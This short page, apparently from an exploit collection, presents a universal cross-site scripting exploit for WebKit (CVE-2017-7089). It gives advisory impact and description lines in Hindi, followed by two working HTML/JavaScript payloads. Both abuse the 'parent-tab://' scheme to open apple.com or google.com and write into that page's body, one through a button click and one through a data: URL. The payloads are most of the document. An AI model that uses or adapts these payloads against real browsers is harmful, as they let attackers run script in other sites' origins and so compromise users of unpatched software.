
Webkit uxss exploit (CVE-2017-7089)
प्रभाव: दुर्भावनापूर्ण रूप से तैयार की गई वेब सामग्री को संसाधित करने से सार्वभौमिक क्रॉस-साइट स्क्रिप्टिंग हो सकती है
विवरण: पैरेंट-टैब के संचालन में एक तार्किक समस्या थी। इस समस्या को बेहतर स्थिति प्रबंधन के साथ हल किया गया।
<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='';}</script><button onclick=Pew();>Click me!</button>
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML=''};setTimeout(y,100)</script>